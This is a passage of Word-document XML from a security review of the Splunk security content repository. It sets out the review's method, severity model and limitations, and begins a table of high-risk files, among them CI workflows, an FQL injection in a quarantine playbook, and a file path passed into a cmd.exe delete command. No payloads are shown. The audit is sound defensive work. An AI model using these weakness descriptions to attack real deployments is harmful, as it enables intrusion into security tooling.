            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Content reviewed programmatically plus by hand on every rule hit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2,169 detection YAML files, 41 baselines, 365 analytic stories, 377 removed-content records</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Build toolchain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>contentctl-ng 1.1.1 (PyPI), Splunk Enterprise 9.3 test container, 38 Splunk add-ons from an S3 bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 What the repository is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The repository is not a web application. It is the source of the Splunk Enterprise Security Content Update app. It contains detection rules written in Splunk Search Processing Language (SPL) inside YAML, Splunk SOAR (formerly Phantom) response playbooks written in Python with JSON editor definitions, SOAR custom functions, lookup tables, two Splunk dashboards, an app skeleton, and the GitHub Actions pipeline that builds, validates and tests the app. Untrusted input therefore enters the system in three ways:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Event data.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Hostnames, file paths, process command lines, e-mail headers, URLs, hashes and usernames in Splunk events are chosen by whoever generates the activity. They become notable events, then SOAR container and artifact fields, and then parameters of playbook actions that run with the SOAR automation account's privileges on Active Directory, AWS, Azure AD, CrowdStrike Falcon, firewalls, DNS filters and mail tenants.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pull requests.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Any GitHub user can open a fork pull request. Workflows build and test that content on GitHub runners.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Dashboard URLs.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Splunk dashboard tokens can be seeded from the URL by anyone who can get a Splunk user to click a link.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Method</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The review combined manual line-by-line reading with automated analysis and executed proofs of concept.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Static analysis tooling.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Bandit 1.8, Semgrep (rulesets p/python, p/github-actions, p/secrets), gitleaks 8.21.2 (working tree and full git history), detect-secrets, pip-audit 2.10 (PyPI advisory database and OSV), pip-licenses. Every scanner hit was triaged by hand and is listed with a verdict in the secrets and dependency sections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Manual review.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Eight reviewers worked in parallel on disjoint slices of the repository (CI and build scripts; playbooks in two batches; custom functions; app template, dashboards, lookups and macros; detection content; secrets; dependencies and licences). Every Python, XML, workflow and configuration file was read in full. The 2,169 detections were parsed with a purpose-written rule checker and every file that tripped a rule was read by hand at the cited lines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof-of-concept execution.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Where a vulnerability lives in string building (shell commands, PowerShell, FQL, LDAP, SPL, ServiceNow queries, REST query strings, zip extraction, regular expressions), the exact code was copied into an isolated sandbox with a stubbed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>phantom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SDK and driven with malicious inputs. The resulting command or query strings, timings and extraction results are reproduced verbatim in each finding. No external system, customer environment or live credential was touched.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Software composition analysis.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The full transitive dependency tree of the build tool (65 packages) was resolved on CPython 3.14 and audited. Component versions, end-of-life dates and licences were verified online against PyPI, OSV, endoflife.date, Docker Hub, Splunkbase, the Go module proxy and upstream licence files; the few items that could not be verified online are marked as reasoned from training knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.4 Severity model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Severity follows CVSS v3.1 base scores adjusted for the realistic attack path: Critical 9.0 to 10.0, High 7.0 to 8.9, Medium 4.0 to 6.9, Low 0.1 to 3.9, Informational for positive controls, false positives worth recording and code-quality notes. Each finding also carries an exploitability verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (demonstrated end to end in the sandbox or by configuration evidence), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (requires a deployment precondition such as a particular connector, asset privilege or analyst action, or an upstream compromise) or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Not exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (defence-in-depth or correctness only).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.5 Limitations and honest statements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>No running application was available for browser testing.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The repository contains no deployable web application. The two Splunk dashboards and the SOAR playbooks only execute inside a Splunk Enterprise or Splunk SOAR instance. The review sandbox has no Docker daemon and no Playwright MCP server, so the Splunk 9.3 test container defined in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> could not be started and the dashboards could not be exercised by clicking through a browser. Every browser-reachable issue (the two dashboard SPL injections) is instead documented with the exact URL payload and the exact steps to reproduce on your own Splunk instance in Section 8.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>No "Codex" approval step exists in this environment.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The requested sign-off by Codex could not be performed; the verification performed is the sandboxed proof-of-concept execution described in each finding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>No source files were modified.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> All remediation code is provided in this report and in the companion mapping files; nothing in the repository was changed, consistent with the instruction not to modify files that were not explicitly requested.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SOAR connector behaviour was not observable.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Several injections (FQL, OData, Gmail search, ServiceNow) terminate in a vendor connector whose server-side parsing could not be exercised offline. Those findings are rated Conditionally exploitable and the demonstrated impact (query widening, fan-out of destructive actions) does not depend on connector parsing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>contentctl-ng source is not public</w:t>
      </w:r>
      <w:r>
        <w:t>, so the build tool itself was reviewed only through its published package metadata and dependency tree.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. File Risk Ratings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Each file that processes untrusted input or handles sensitive data was rated 1 to 5 for how likely it is to contain an interesting security, logic, authentication, authorization, injection, input-validation, error-handling or memory-management weakness. A rating of 5 means untrusted input reaches a dangerous sink or a confirmed secret was found; 4 means a likely issue or dangerous pattern; 3 moderate; 2 low; 1 inert data or documentation. The repository holds 4,256 files, most of which are inert detection metadata, so the tables below list every file that earned a 4 or 5 through a confirmed finding, followed by directory-level ratings for the large homogeneous groups.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 Files rated 5 (untrusted input reaches a dangerous sink, or a confirmed secret)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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3089"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="1978"/>
        <w:gridCol w:w="2673"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Finding(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Why</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>.github/workflows/unit-testing.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-01,CI-02,CI-10,CI-14,DEP-01,DEP-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PR branch name interpolated into run steps; builds untrusted fork code on a large runner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>.github/workflows/update_splunk_tas.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CI-03,DEP-02,DEP-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unpinned package install while holding long-lived cloud credentials that write the shared bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/Cisco_Umbrella_DNS_Denylisting.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/CrowdStrike_OAuth_API_Network_Isolation.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>FQL filter injection drives quarantine of arbitrary hosts, no gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/DNS_Denylisting_Dispatch.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/Panorama_Outbound_Traffic_Filtering.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Destructive response actions (account disable/enable, quarantine, kill, delete, block, global prevent IOC) with no approval gate or allow-list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/delete_detected_files.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB2-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2673" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>File path substituted into a cmd.exe del/more command with no approval gate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3089" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="9C274A"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>playbooks/malware_hunt_and_contain.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1978" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
